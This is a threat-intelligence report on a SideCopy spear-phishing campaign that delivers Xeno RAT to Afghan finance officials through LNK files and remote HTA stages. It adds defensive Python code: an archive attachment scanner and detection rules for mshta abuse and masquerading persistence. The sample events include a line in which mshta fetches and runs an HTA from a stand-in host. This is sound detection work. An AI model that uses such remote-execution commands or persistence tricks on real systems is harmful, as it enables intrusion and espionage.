Full Report
Cybersecurity researchers have disclosed details of a spear-phishing campaign likely undertaken by the Pakistan-aligned SideCopy group targeting Afghanistan's Ministry of Finance with an open-source remote access trojan called Xeno RAT. "The campaign opens with a spear phishing delivery - a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,"
Analysis Summary
# Threat Actor: SideCopy
## Attribution & Identity
* **Actor Name:** SideCopy
* **Country of Origin:** Pakistan (Pakistan-aligned)
* **Known Aliases:** Associated with the broader "Transparent Tribe" (aka APT36) umbrella.
* **Identification:** Attributed to Pakistani state-aligned interests; assessed to operate as a sub-group of, or a cluster closely related to, Transparent Tribe.
## Activity Summary
* **Operation XENOFISCAL (2026):** A coordinated spear-phishing campaign targeting the Afghan Ministry of Finance and related provincial entities.
* **April 2025 Campaign:** Previous attribution for attacks targeting various sectors in India using Xeno RAT, Spark RAT, and CurlBack RAT.
## Tactics, Techniques & Procedures
* **Spear-Phishing (T1566.001):** Delivery via ZIP archives containing malicious LNK files with Pashto-language filenames to increase lure credibility.
* **Execution via Native Tools (T1218.005):** LNK files leverage `mshta.exe` to execute remote HTML Applications (HTA).
* **In-Memory Execution:** The remote HTA carries obfuscated JavaScript that runs in memory, so the loader stage leaves little on disk for file-based detection.
* **Persistence (T1547.001, T1053.005):** Registry Run-key entries named to mimic legitimate applications (e.g., Microsoft Edge), plus scheduled tasks that relaunch the implant.
* **Deception:** A decoy document is shown to the victim while the payload stages in the background.
* **C2 Communication:** Xeno RAT talks to its operator over a TCP channel through which commands are issued and results returned.
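The delivery stage listed under Spear-Phishing above, as an added example that is not code from the report or from SideCopy's tooling: a Python attachment scanner that opens a ZIP in memory and flags LNK, HTA and JS members, taking the last extension so a double-extension name such as `budget.pdf.lnk` is still caught, and recursing into nested ZIPs up to a fixed depth. The sample archive, its Pashto member name and the member byte contents are constructed placeholders; the blocked-extension list and the nesting limit are assumptions, not values from the report.

```python
"""Added example (not from the report): flag LNK/HTA/JS droppers inside a ZIP attachment."""
import io
import os
import zipfile

# Assumption: the three dropper types named in the mitigation guidance.
BLOCKED_EXTENSIONS = {".lnk", ".hta", ".js"}
MAX_NESTING = 2  # assumption: how many nested ZIP layers to open before giving up


def _ext(name: str) -> str:
    # splitext keeps only the LAST suffix, so "budget.pdf.lnk" -> ".lnk"
    return os.path.splitext(name)[1].lower()


def scan_zip(data: bytes, prefix: str = "", depth: int = 0) -> list[str]:
    """Return member paths with a blocked extension, descending into nested ZIPs."""
    findings: list[str] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not an archive at all; nothing to flag here
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            ext = _ext(info.filename)
            if ext in BLOCKED_EXTENSIONS:
                findings.append(path)
            elif ext == ".zip" and depth < MAX_NESTING:
                findings.extend(scan_zip(zf.read(info), path + "/", depth + 1))
    return findings


def verdict(data: bytes) -> str:
    """'block' if any member (at any handled depth) is a dropper type, else 'allow'."""
    return "block" if scan_zip(data) else "allow"


def build_sample_archive() -> bytes:
    """Constructed sample: a Pashto-named double-extension LNK, a decoy PDF and a
    nested ZIP holding an HTA. Byte contents are placeholders, not real LNK/HTA files."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("update.hta", b"<html><script>/* placeholder */</script></html>")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("د مالیې وزارت.pdf.lnk", b"L\x00\x00\x00")  # "Ministry of Finance" lure name
        zf.writestr("budget.pdf", b"%PDF-1.4 decoy")
        zf.writestr("archive.zip", inner.getvalue())
    return outer.getvalue()


def build_clean_archive() -> bytes:
    """Constructed sample with only a PDF, to show the allow path."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("budget.pdf", b"%PDF-1.4 benign")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_archive()
    print(verdict(sample), scan_zip(sample))
```

The nesting limit matters in both directions: without it a mail gateway can be stalled by deeply nested archives, but with a limit of zero a one-level `archive.zip` wrapper would slip the HTA past an extension filter.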
## Targeting
* **Sectors:** Government, Finance, Defense, Revenue Directorates.
* **Geography:** Afghanistan (Primary focus of current campaign), India (Historical focus).
* **Victims:**
* Afghanistan Ministry of Finance.
* Afghan Provincial revenue and finance directorates.
* Pashto-speaking government officials and employees.
* Indian military and defense infrastructure (associated Transparent Tribe activity).
## Tools & Infrastructure
* **Malware Families:**
* **Xeno RAT (v1.8.7):** Open-source remote access trojan with capabilities for keylogging, screen capture, webcam/mic monitoring, and SOCKS5 proxy tunneling.
* **Others:** Spark RAT, CurlBack RAT, and DeskRAT (associated with Transparent Tribe).
* **Infrastructure:**
* **Compromised Domains:** `[target-site].edu.af` (Afghan education domain used for staging HTA payloads).
* **C2:** Remote servers over TCP. *Note: Specific defanged IPs/URLs were not detailed in the source text.*
## Implications
SideCopy demonstrates a high degree of regional specialization, evidenced by the use of local Pashto language lures to penetrate Afghan government circles. The shift between Indian and Afghan targets suggests a strategic alignment with Pakistan's regional geopolitical interests. The transition to using open-source tools like Xeno RAT suggests a trend toward cost-effective, customizable, and potentially harder-to-attribute malware.
## Mitigations
* **Email Security:** Implement attachment filtering that inspects archive members, not just the outer file type: block or quarantine ZIP files that contain LNK, HTA, or JS members, including double-extension names such as `report.pdf.lnk` and archives nested inside archives.
* **Process and Network Monitoring:** Alert on `mshta.exe` launched with a URL on its command line or connecting to external domains, and on script hosts spawning from `explorer.exe` shortly after an archive is opened; SRUM network-usage records can corroborate such connections retrospectively.
* **Endpoint Reinforcement:** Audit and restrict the creation of Scheduled Tasks and of values under the `Run` and `RunOnce` keys, paying particular attention to entries whose names mimic legitimate software but whose paths point into user-writable directories.
* **Language-Based Awareness:** Conduct targeted phishing simulations for government employees using regional language lures (Pashto/Dari/Urdu).
* **Egress Filtering:** Deny outbound TCP on non-standard ports by default to disrupt RAT C2; C2 that rides on 443 will not be caught by port blocking alone and needs proxying or TLS inspection.
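The execution and persistence chain under Tactics, Techniques & Procedures above, and the process-monitoring and endpoint-reinforcement items in this list, as an added example that is not from the report or the researchers' tooling: three small detection rules run over constructed Sysmon (EventID 1 process create, EventID 13 registry value set) and Windows Security (4698 scheduled task created) records. The field names (`Image`, `CommandLine`, `TargetObject`, `Details`, `TaskContent`) are the real ones those events carry; the events themselves, the host names, the `MicrosoftEdgeUpdate` value name, the AppData path and the `.invalid` URL are constructed assumptions about what the masquerade would look like, not indicators from the report.

```python
"""Added example (not from the report): detections for the LNK -> mshta -> persistence chain."""
import re

URL = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
# Assumption: directories a non-admin user can write to, where an implant would live.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData)\\", re.IGNORECASE)
EDGE_LIKE = re.compile(r"edge", re.IGNORECASE)


def rule_mshta_remote(ev: dict):
    """Sysmon 1: mshta.exe handed a URL, i.e. fetching a remote HTA stage."""
    if (ev.get("EventID") == 1
            and ev.get("Image", "").lower().endswith("\\mshta.exe")
            and URL.search(ev.get("CommandLine", ""))):
        return "mshta_remote_hta"
    return None


def rule_run_key(ev: dict):
    """Sysmon 13: Run/RunOnce value whose data points into a user-writable path."""
    if ev.get("EventID") != 13:
        return None
    target, details = ev.get("TargetObject", ""), ev.get("Details", "")
    if not (RUN_KEY.search(target) and USER_WRITABLE.search(details)):
        return None
    value_name = target.rsplit("\\", 1)[-1]
    # Edge-sounding value name that does not resolve into Program Files: masquerade.
    if EDGE_LIKE.search(value_name) and "program files" not in details.lower():
        return "run_key_edge_masquerade"
    return "run_key_user_writable"


def rule_schtask(ev: dict):
    """Security 4698: new scheduled task whose action runs from a user-writable path."""
    if ev.get("EventID") == 4698 and USER_WRITABLE.search(ev.get("TaskContent", "")):
        return "schtask_user_writable"
    return None


RULES = (rule_mshta_remote, rule_run_key, rule_schtask)


def detect(events):
    """Run every rule over every event; return one alert dict per hit, in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append({"rule": hit, "host": ev.get("Computer", "?"), "event": ev})
    return alerts


def score_hosts(alerts):
    """'high' when a host shows the remote-HTA stage AND a persistence hit, else 'medium'."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return {h: ("high" if "mshta_remote_hta" in r and len(r) > 1 else "medium")
            for h, r in by_host.items()}


# Constructed telemetry: two benign records and the three stages of the chain on FIN-WS01.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "FIN-WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "msedge.exe"},                                   # benign Edge launch
    {"EventID": 1, "Computer": "FIN-WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://staging.invalid/update.hta"},  # LNK -> remote HTA
    {"EventID": 13, "Computer": "FIN-WS01",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "Details": r"C:\Users\ahmad\AppData\Roaming\MicrosoftEdge\msedge.exe"},  # Edge masquerade
    {"EventID": 13, "Computer": "FIN-WS02",
     "TargetObject": r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},  # benign Run value
    {"EventID": 4698, "Computer": "FIN-WS01",
     "TaskContent": r"<Exec><Command>C:\Users\ahmad\AppData\Roaming\MicrosoftEdge\msedge.exe</Command></Exec>"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for a in hits:
        print(a["host"], a["rule"])
    print(score_hosts(hits))
```

The mshta rule keys on a URL argument because a double-clicked local HTA also has `explorer.exe` as parent; inline `javascript:` or `vbscript:` protocol-handler invocations of `mshta.exe` are a separate pattern this rule does not cover and deserve their own alert. The Run-key rule deliberately does not trust the value name: the report's point is that the entry is named after Edge, so the path is what gets checked.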